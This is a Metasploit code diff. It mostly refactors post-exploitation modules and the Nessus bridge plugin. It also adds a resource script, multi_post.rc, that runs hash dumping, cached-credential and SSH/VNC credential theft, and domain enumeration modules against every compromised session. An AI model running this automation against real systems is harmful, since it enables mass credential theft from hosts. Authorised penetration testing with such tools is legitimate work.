["PWCHAR", "szDataDescr", "out"],
["PBLOB", "pOptionalEntropy", "in"],
["PDWORD", "pvReserved", "in"],
["PBLOB", "pPromptStruct", "in"],
["DWORD", "dwFlags", "in"],
["PBLOB", "pDataOut", "out"]
])
end
end

26
modules/post/windows/gather/enum_domains.rb
View File

@ -25,32 +25,6 @@ class Metasploit3 < Msf::Post
end
def run
#structure
=begin
NET_API_STATUS NetServerEnum(
__in_opt LPCWSTR servername,
__in DWORD level,
__out LPBYTE *bufptr,
__in DWORD prefmaxlen,
__out LPDWORD entriesread,
__out LPDWORD totalentries,
__in DWORD servertype,
__in_opt LPCWSTR domain,
__inout_opt LPDWORD resume_handle
);
=end
client.railgun.add_function('netapi32', 'NetServerEnum', 'DWORD',[
['PWCHAR','servername','in'],
['DWORD','level','in'],
['PDWORD','bufptr','out'],
['DWORD','prefmaxlen','in'],
['PDWORD','entriesread','out'],
['PDWORD','totalentries','out'],
['DWORD','servertype','in'],
['PWCHAR','domain','in'],
['PDWORD','resume_handle','inout']
])
domain_enum = 2147483648 # SV_TYPE_DOMAIN_ENUM = hex 80000000
buffersize = 500

6
modules/post/windows/gather/reverse_lookup.rb
View File

@ -53,12 +53,6 @@ class Metasploit3 < Msf::Post
end
end
#Initialize Railgun 'gethostbyaddr' call'
session.railgun.add_function('ws2_32', 'gethostbyaddr', 'DWORD', [
['PCHAR', 'addr', 'in'],
['DWORD','len','in'],
['DWORD','type','in']])
#Generates IP list based on RHOSTS - RangeWalker rocks....
iplist = Rex::Socket::RangeWalker.new(datastore['RHOSTS'])

41
modules/post/windows/recon/computer_browser_discovery.rb
View File

@ -68,47 +68,6 @@ class Metasploit3 < Msf::Post
### MAIN ###
client = session
=begin
NET_API_STATUS NetUserEnum(
__in LPCWSTR servername,
__in DWORD level,
__in DWORD filter,
__out LPBYTE *bufptr,
__in DWORD prefmaxlen,
__out LPDWORD entriesread,
__out LPDWORD totalentries,
__inout LPDWORD resume_handle
);
client.railgun.add_function( 'netapi32', 'NetUserEnum', 'DWORD',[
["PWCHAR","servername","in"],
["DWORD","level","in"],
["DWORD","filter","in"],
["PDWORD","bufptr","out"],
["DWORD","prefmaxlen","in"],
["PDWORD","entriesread","out"],
["PDWORD","totalentries","out"],
["PDWORD","resume_handle","inout"]])
=end
client.railgun.add_function(
'netapi32', 'NetServerEnum', 'DWORD',
[
["PBLOB","servername","in"], ["DWORD","level","in"], ["PDWORD","bufptr","out"],
["DWORD","prefmaxlen","in"], ["PDWORD","entriesread","out"], ["PDWORD","totalentries","out"],
["DWORD","servertype","in"], ["PWCHAR","domain","in"], ["DWORD","resume_handle","inout"]
]
)
client.railgun.add_function(
'ws2_32', 'getaddrinfo', 'DWORD',
[
["PCHAR","pNodeName","in"], ["PCHAR","pServiceName","in"],
["PDWORD","pHints","in"], ["PDWORD","ppResult","out"]
]
)
domain = nil
# Default = SV_TYPE_NT

1
modules/post/windows/recon/resolve_hostname.rb
View File

@ -28,7 +28,6 @@ class Metasploit3 < Msf::Post
def run
### MAIN ###
client.railgun.add_function( 'ws2_32', 'getaddrinfo', 'DWORD',[["PCHAR","pNodeName","in"],["PCHAR","pServiceName","in"],["PDWORD","pHints","in"],["PDWORD","ppResult","out"]])
if client.platform =~ /^x64/
size = 64

150
plugins/nessus.rb
View File

@ -5,20 +5,15 @@ require 'nessus/nessus-xmlrpc'
require 'rex/parser/nessus_xml'
module Msf
#constants
NBVer = "1.1" # Nessus Plugin Version. Increments each time we commit to msf
Xindex = "#{Msf::Config.get_config_root}/nessus_index" # location of the exploit index file used to speed up searching for valid exploits.
Nessus_yaml = "#{Msf::Config.get_config_root}/nessus.yaml" #location of the nessus.yml containing saved nessus creds
class Plugin::Nessus < Msf::Plugin
#creates the index of exploit details to make searching for exploits much faster.
def create_xindex
start = Time.now
print_status("Creating Exploit Search Index - (#{Xindex}) - this wont take long.")
print_status("Creating Exploit Search Index - (#{@xindex}) - this wont take long.")
count = 0
# use Msf::Config.get_config_root as the location.
File.open("#{Xindex}", "w+") do |f|
File.open("#{@xindex}", "w+") do |f|
#need to add version line.
f.puts(Msf::Framework::RepoRevision)
framework.exploits.sort.each { |refname, mod|
@ -48,13 +43,13 @@ module Msf
end
def nessus_index
if File.exist?("#{Xindex}")
if File.exist?("#{@xindex}")
#check if it's version line matches current version.
File.open("#{Xindex}") {|f|
File.open("#{@xindex}") {|f|
line = f.readline
line.chomp!
if line.to_i == Msf::Framework::RepoRevision
print_good("Exploit Index - (#{Xindex}) - is valid.")
print_good("Exploit Index - (#{@xindex}) - is valid.")
else
create_xindex
end
@ -73,42 +68,41 @@ module Msf
def commands
{
"nessus_connect" => "Connect to a nessus server: nconnect username:password@hostname:port <ssl ok>",
"nessus_admin" => "Checks if user is an admin",
"nessus_help" => "Get help on all commands",
"nessus_logout" => "Terminate the session",
"nessus_server_status" => "Check the status of your Nessus Server",
"nessus_server_feed" => "Nessus Feed Type",
"nessus_server_prefs" => "Display Server Prefs",
"nessus_report_list" => "List all Nessus reports",
"nessus_report_get" => "Import a report from the nessus server in Nessus v2 format",
"nessus_report_del" => "Delete a report",
"nessus_report_hosts" => "Get list of hosts from a report",
"nessus_report_host_ports" => "Get list of open ports from a host from a report",
"nessus_report_host_detail" => "Detail from a report item on a host",
"nessus_scan_status" => "List all currently running Nessus scans",
"nessus_scan_new" => "Create new Nessus Scan",
"nessus_scan_pause" => "Pause a Nessus Scan",
"nessus_scan_pause_all" => "Pause all Nessus Scans",
"nessus_scan_stop" => "Stop a Nessus Scan",
"nessus_scan_stop_all" => "Stop all Nessus Scans",
"nessus_scan_resume" => "Resume a Nessus Scan",
"nessus_scan_resume_all" => "Resume all Nessus Scans",
"nessus_user_list" => "Show Nessus Users",
"nessus_user_add" => "Add a new Nessus User",
"nessus_user_del" => "Delete a Nessus User",
"nessus_user_passwd" => "Change Nessus Users Password",
"nessus_plugin_family" => "List plugins in a family",
"nessus_plugin_details" => "List details of a particular plugin",
"nessus_plugin_list" => "Displays each plugin family and the number of plugins",
"nessus_plugin_prefs" => "Display Plugin Prefs",
"nessus_policy_list" => "List all polciies",
"nessus_policy_del" => "Delete a policy",
"nessus_connect" => "Connect to a nessus server: nconnect username:password@hostname:port <ssl ok>.",
"nessus_admin" => "Checks if user is an admin.",
"nessus_help" => "Get help on all commands.",
"nessus_logout" => "Terminate the session.",
"nessus_server_status" => "Check the status of your Nessus Server.",
"nessus_server_feed" => "Nessus Feed Type.",
"nessus_server_prefs" => "Display Server Prefs.",
"nessus_report_list" => "List all Nessus reports.",
"nessus_report_get" => "Import a report from the nessus server in Nessus v2 format.",
"nessus_report_del" => "Delete a report.",
"nessus_report_hosts" => "Get list of hosts from a report.",
"nessus_report_host_ports" => "Get list of open ports from a host from a report.",
"nessus_report_host_detail" => "Detail from a report item on a host.",
"nessus_scan_status" => "List all currently running Nessus scans.",
"nessus_scan_new" => "Create new Nessus Scan.",
"nessus_scan_pause" => "Pause a Nessus Scan.",
"nessus_scan_pause_all" => "Pause all Nessus Scans.",
"nessus_scan_stop" => "Stop a Nessus Scan.",
"nessus_scan_stop_all" => "Stop all Nessus Scans.",
"nessus_scan_resume" => "Resume a Nessus Scan.",
"nessus_scan_resume_all" => "Resume all Nessus Scans.",
"nessus_user_list" => "Show Nessus Users.",
"nessus_user_add" => "Add a new Nessus User.",
"nessus_user_del" => "Delete a Nessus User.",
"nessus_user_passwd" => "Change Nessus Users Password.",
"nessus_plugin_family" => "List plugins in a family.",
"nessus_plugin_details" => "List details of a particular plugin.",
"nessus_plugin_list" => "Displays each plugin family and the number of plugins.",
"nessus_plugin_prefs" => "Display Plugin Prefs.",
"nessus_policy_list" => "List all polciies.",
"nessus_policy_del" => "Delete a policy.",
"nessus_index" => "Manually generates a search index for exploits.",
"nessus_template_list" => "List all the templates on the server",
"nessus_db_scan" => "Create a scan of all ips in db_hosts",
"nessus_save" => "Save username/passowrd/server/port details",
"nessus_report_exploits" => "Shows a summary of all the vulns in a scan that have a msf exploit."
"nessus_template_list" => "List all the templates on the server.",
"nessus_db_scan" => "Create a scan of all ips in db_hosts.",
"nessus_save" => "Save username/passowrd/server/port details."
}
end
@ -135,10 +129,10 @@ module Msf
if ((@user and @user.length > 0) and (@host and @host.length > 0) and (@port and @port.length > 0 and @port.to_i > 0) and (@pass and @pass.length > 0))
config = Hash.new
config = {"#{group}" => {'username' => @user, 'password' => @pass, 'server' => @host, 'port' => @port}}
File.open("#{Nessus_yaml}", "w+") do |f|
File.open("#{@nessus_yaml}", "w+") do |f|
f.puts YAML.dump(config)
end
print_good("#{Nessus_yaml} created.")
print_good("#{@nessus_yaml} created.")
else
print_error("Missing username/password/server/port - relogin and then try again.")
@ -198,8 +192,8 @@ module Msf
def cmd_nessus_logout
@token = nil
print_status("Logged out")
system("rm #{Nessus_yaml}")
print_good("#{Nessus_yaml} removed.")
system("rm #{@nessus_yaml}")
print_good("#{@nessus_yaml} removed.")
return
end
@ -259,7 +253,7 @@ module Msf
tbl << [ "nessus_policy_list", "List all polciies" ]
tbl << [ "nessus_policy_del", "Delete a policy" ]
print_status ""
print_status tbl.to_s
print_line tbl.to_s
print_status ""
end
@ -285,7 +279,7 @@ module Msf
tbl << [@feed, @version, @web_version]
print_good("Nessus Status")
print_good "\n"
print_good tbl.to_s + "\n"
print_line tbl.to_s
end
end
@ -327,8 +321,8 @@ module Msf
def cmd_nessus_connect(*args)
if ! args[0]
if File.exist?("#{Nessus_yaml}")
lconfig = YAML.load_file("#{Nessus_yaml}")
if File.exist?("#{@nessus_yaml}")
lconfig = YAML.load_file("#{@nessus_yaml}")
@user = lconfig['default']['username']
@pass = lconfig['default']['password']
@host = lconfig['default']['server']
@ -483,7 +477,7 @@ module Msf
}
print_good("Nessus Report List")
print_good "\n"
print_good tbl.to_s + "\n"
print_line tbl.to_s + "\n"
print_status("You can:")
print_status(" Get a list of hosts from the report: nessus_report_hosts <report id>")
end
@ -609,7 +603,7 @@ module Msf
}
print_good("Running Scans")
print_good "\n"
print_good tbl.to_s + "\n"
print_line tbl.to_s
print_good "\n"
print_status("You can:")
print_good(" Import Nessus report to database : nessus_report_get <reportid>")
@ -655,7 +649,7 @@ module Msf
}
print_good("Templates")
print_good "\n"
print_good tbl.to_s + "\n"
print_line tbl.to_s + "\n"
print_good "\n"
print_status("You can:")
print_good(" Import Nessus report to database : nessus_report_get <reportid>")
@ -695,7 +689,7 @@ module Msf
}
print_good("Nessus users")
print_good "\n"
print_good tbl.to_s + "\n"
print_line tbl.to_s
end
def cmd_nessus_server_status(*args)
@ -755,7 +749,7 @@ module Msf
plugins = total.sum
tbl << [users, policies, scans, reports, plugins]
print_good "\n"
print_good tbl.to_s + "\n"
print_line tbl.to_s
end
def cmd_nessus_plugin_list(*args)
@ -789,7 +783,7 @@ module Msf
tbl << [ 'Total Plugins', plugins ]
print_good("Plugins By Family")
print_good "\n"
print_good tbl.to_s + "\n"
print_line tbl.to_s
print_status("List plugins for a family : nessus_plugin_family <family name>")
end
@ -959,7 +953,7 @@ module Msf
}
print_good("Report Info")
print_good "\n"
print_good tbl.to_s + "\n"
print_line tbl.to_s
print_status("You can:")
print_status(" Get information from a particular host: nessus_report_host_ports <hostname> <report id>")
end
@ -1007,7 +1001,7 @@ module Msf
}
print_good("Host Info")
print_good "\n"
print_good tbl.to_s + "\n"
print_line tbl.to_s
print_status("You can:")
print_status(" Get detailed scan infromation about a specfic port: nessus_report_host_detail <hostname> <port> <protocol> <report id>")
end
@ -1069,7 +1063,7 @@ module Msf
}
print_good("Port Info")
print_good "\n"
print_good tbl.to_s + "\n"
print_line tbl.to_s
end
def cmd_nessus_scan_pause_all(*args)
@ -1358,7 +1352,7 @@ module Msf
}
print_good("#{fam} Info")
print_good "\n"
print_good tbl.to_s + "\n"
print_line tbl.to_s
end
def cmd_nessus_policy_list(*args)
@ -1388,7 +1382,7 @@ module Msf
}
print_good("Nessus Policy List")
print_good "\n"
print_good tbl.to_s + "\n"
print_line tbl.to_s
end
def cmd_nessus_policy_del(*args)
@ -1422,7 +1416,7 @@ module Msf
return
end
if answer == "Yes" || answer == "Y" || answer == "y" || answer == "yes"
del = @n.policy_del(pid)
status = del.root.elements['status'].text
if status == "OK"
@ -1430,10 +1424,8 @@ module Msf
else
print_error("Policy number #{pid} was not deleted")
end
else
print_error("wow that was close, damn we asked")
end
end
def cmd_nessus_plugin_details(*args)
@ -1484,7 +1476,7 @@ module Msf
tbl << [ "Plugin Pub Date", entry['plugin_publication_date'] ]
tbl << [ "Plugin Modification Date", entry['plugin_modification_date'] ]
print_good "\n"
print_good tbl.to_s + "\n"
print_line tbl.to_s
end
def cmd_nessus_report_del(*args)
@ -1518,7 +1510,7 @@ module Msf
return
end
if (answer == "Yes" || answer == "Y" || answer == "y" || answer == "yes")
del = @n.report_del(rid)
status = del.root.elements['status'].text
if status == "OK"
@ -1526,13 +1518,8 @@ module Msf
else
print_error("Report #{rid} was not deleted")
end
else
print_error("wow that was close, damn we asked")
end
end
def cmd_nessus_server_prefs(*args)
if args[0] == "-h"
@ -1564,7 +1551,7 @@ module Msf
}
print_good("Nessus Server Pref List")
print_good "\n"
print_good tbl.to_s + "\n"
print_line tbl.to_s + "\n"
end
@ -1600,7 +1587,7 @@ module Msf
}
print_good("Nessus Plugins Pref List")
print_good "\n"
print_good tbl.to_s + "\n"
print_line tbl.to_s
end
end
@ -1608,9 +1595,12 @@ module Msf
super
add_console_dispatcher(ConsoleCommandDispatcher)
print_status("Nessus Bridge for Metasploit #{NBVer}")
@nbver = "1.1" # Nessus Plugin Version. Increments each time we commit to msf
@xindex = "#{Msf::Config.get_config_root}/nessus_index" # location of the exploit index file used to speed up searching for valid exploits.
@nessus_yaml = "#{Msf::Config.get_config_root}/nessus.yaml" #location of the nessus.yml containing saved nessus creds
print_status("Nessus Bridge for Metasploit #{@nbver}")
print_good("Type %bldnessus_help%clr for a command listing")
nessus_index
#nessus_index
end
def cleanup
@ -1622,7 +1612,7 @@ module Msf
end
def desc
"Nessus Bridge for Metasploit #{NBVer}"
"Nessus Bridge for Metasploit #{@nbver}"
end
protected
end

119
scripts/resource/multi_post.rc Normal file
View File

@ -0,0 +1,119 @@
# multi_post.rc
# Author: m-1-k-3 (Web: http://www.s3cur1ty.de / Twitter: @s3cur1ty_de)
# This Metasploit RC-File could be used to automate the post-exploitation process
# VERBOSE is used from the global datastore
# check out the meterpreter_commands and the modules_win and modules_lin and modules_multi
# you could add your own post exploitation modules into them
<ruby>
if (framework.datastore['VERBOSE'] == "true") #we look in the global datastore for a global VERBOSE option and use it
verbose = 1 #true
else
verbose = 0
end
meterpreter_commands = [
'sysinfo',
'getuid',
'getpid',
'ps',
'ipconfig'
]
modules_win = [
'post/windows/gather/hashdump',
'post/windows/gather/cachedump',
'post/windows/gather/smart_hashdump',
'post/windows/gather/enum_tokens',
'post/windows/gather/enum_domain',
'post/windows/gather/enum_domain_group_users',
'post/windows/gather/enum_domain_tokens',
'post/windows/gather/enum_hostfile',
'post/windows/gather/enum_ie',
'post/windows/gather/enum_logged_on_users',
'post/windows/gather/enum_ms_product_keys',
'post/windows/gather/credentials/vnc',
'post/windows/gather/credentials/windows_autologin',
'post/windows/gather/checkvm',
'post/windows/gather/enum_applications',
'post/windows/gather/enum_services',
'post/windows/gather/enum_shares',
'post/windows/gather/enum_snmp',
'post/windows/gather/enum_devices',
'post/windows/gather/enum_powershell_env'
] # add some more modules or comment some out ...
modules_lin = [
'post/linux/gather/hashdump',
'post/osx/gather/hashdump',
'post/linux/gather/checkvm',
'post/linux/gather/enum_cron',
'post/linux/gather/enum_linux',
'post/linux/gather/enum_packages',
'post/linux/gather/enum_services',
'post/osx/gather/enum_osx'
]
modules_multi = [
'post/multi/gather/env',
'post/multi/gather/ssh_creds'
]
if (framework.sessions.length > 0) # lets start if we have a session
print_status("starting with post exploitation stuff")
framework.sessions.each_key do |sid|
session = framework.sessions[sid]
#meterpreter commands against every meterpreter session
if(session.type == "meterpreter")
print_line("starting meterpreter commands on session number #{sid}")
meterpreter_commands.each { |command|
print_line("running meterpreter command #{command}")
session.console.run_single("#{command.to_s}")
print_line
}
end
end
print_status("starting the post exploitation with post exploitation modules")
# lets start with post exploitation modules
framework.sessions.each_key do |sid|
session = framework.sessions[sid]
ips = session.tunnel_peer.split(":")
print_status("Session ID: #{sid.to_i} - IP: #{ips[0]}")
modules_multi.each { |modul| # multi -> all sessions
run_single("use #{modul}")
run_single("set SESSION #{sid}")
if (verbose == 1)
run_single("run -j")
else
run_single("run -j -q")
end
}
if(session.platform =~ /win/) # windows sessions
modules_win.each { |modul|
run_single("use #{modul}")
run_single("set SESSION #{sid}")
if (verbose == 1)
run_single("run -j")
else
run_single("run -j -q")
end
}
else # all other sessions -> typical some linux or unix based systems
modules_lin.each { |modul|
run_single("use #{modul}")
run_single("set SESSION #{sid}")
if (verbose == 1)
run_single("run -j")
else
run_single("run -j -q")
end
}
end
end
else
print_error("no sessions available")
end
run_single("back")
</ruby>